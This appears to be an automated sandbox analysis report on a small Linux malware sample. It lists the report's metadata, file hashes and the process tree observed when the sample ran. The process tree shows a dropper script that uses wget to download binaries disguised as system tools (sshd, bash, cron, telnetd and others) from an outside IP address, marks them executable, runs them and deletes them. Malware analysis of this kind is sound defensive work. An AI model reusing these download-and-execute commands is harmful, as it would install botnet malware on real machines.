Analysis
-
max time kernel
1s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
16-06-2024 23:47
Static task
static1
Behavioral task
behavioral1
Sample
b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118
Resource
debian9-mipsel-20240611-en
General
-
Target
b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118
-
Size
1KB
-
MD5
b5d1b02949999a3eeb829840ff8d2fae
-
SHA1
56efab4c12d0c9fe4c50478e6fb1b07585ffea00
-
SHA256
e8870d855c6592d00913d785affd6b7bd0496643450668d83b40d149c42d1239
-
SHA512
570367f105e94b636aa6a1a60f249006a278275a36ccb7048bcb5b7301f8d32c4a17fe59f48dd79160a7f8decd6ae4c81739b87f51dd9960afce94a16733b71a
Malware Config
Signatures
Processes
-
/tmp/b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118/tmp/b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes1181⤵PID:1508
-
/usr/bin/wgetwget http://145.239.72.250/ntpd2⤵PID:1509
-
/bin/chmodchmod +x ntpd2⤵PID:1517
-
/tmp/ntpd./ntpd2⤵PID:1518
-
/bin/rmrm -rf ntpd2⤵PID:1519
-
/usr/bin/wgetwget http://145.239.72.250/sshd2⤵PID:1520
-
/bin/chmodchmod +x sshd2⤵PID:1524
-
/tmp/sshd./sshd2⤵PID:1525
-
/bin/rmrm -rf sshd2⤵PID:1526
-
/usr/bin/wgetwget http://145.239.72.250/openssh2⤵PID:1527
-
/bin/chmodchmod +x openssh2⤵PID:1528
-
/tmp/openssh./openssh2⤵PID:1532
-
/bin/rmrm -rf openssh2⤵PID:1533
-
/usr/bin/wgetwget http://145.239.72.250/bash2⤵PID:1534
-
/bin/chmodchmod +x bash2⤵PID:1535
-
/tmp/bash./bash2⤵PID:1539
-
/bin/rmrm -rf bash2⤵PID:1540
-
/usr/bin/wgetwget http://145.239.72.250/tftp2⤵PID:1541
-
/bin/chmodchmod +x tftp2⤵PID:1542
-
/tmp/tftp./tftp2⤵PID:1543
-
/bin/rmrm -rf tftp2⤵PID:1547
-
/usr/bin/wgetwget http://145.239.72.250/wget2⤵PID:1548
-
/bin/chmodchmod +x wget2⤵PID:1552
-
/tmp/wget./wget2⤵PID:1553
-
/bin/rmrm -rf wget2⤵PID:1554
-
/usr/bin/wgetwget http://145.239.72.250/cron2⤵PID:1555
-
/bin/chmodchmod +x cron2⤵PID:1559
-
/tmp/cron./cron2⤵PID:1560
-
/bin/rmrm -rf cron2⤵PID:1561
-
/usr/bin/wgetwget http://145.239.72.250/ftp2⤵PID:1562
-
/bin/chmodchmod +x ftp2⤵PID:1566
-
/tmp/ftp./ftp2⤵PID:1567
-
/bin/rmrm -rf ftp2⤵PID:1568
-
/usr/bin/wgetwget http://145.239.72.250/pftp2⤵PID:1569
-
/bin/chmodchmod +x pftp2⤵PID:1570
-
/tmp/pftp./pftp2⤵PID:1574
-
/bin/rmrm -rf pftp2⤵PID:1575
-
/usr/bin/wgetwget http://145.239.72.250/sh2⤵PID:1576
-
/bin/chmodchmod +x sh2⤵PID:1577
-
/tmp/sh./sh2⤵PID:1581
-
/bin/rmrm -rf sh2⤵PID:1582
-
/usr/bin/wgetwget "http://145.239.72.250/ "2⤵PID:1583
-
/bin/chmodchmod +x " "2⤵PID:1584
-
/tmp/"./ "2⤵PID:1585
-
/bin/rmrm -rf " "2⤵PID:1586
-
/usr/bin/wgetwget http://145.239.72.250/apache22⤵PID:1590
-
/bin/chmodchmod +x apache22⤵PID:1591
-
/tmp/apache2./apache22⤵PID:1595
-
/bin/rmrm -rf apache22⤵PID:1596
-
/usr/bin/wgetwget http://145.239.72.250/telnetd2⤵PID:1597
-
/bin/chmodchmod +x telnetd2⤵PID:1598
-
/tmp/telnetd./telnetd2⤵PID:1599
-
/bin/rmrm -rf telnetd2⤵PID:1600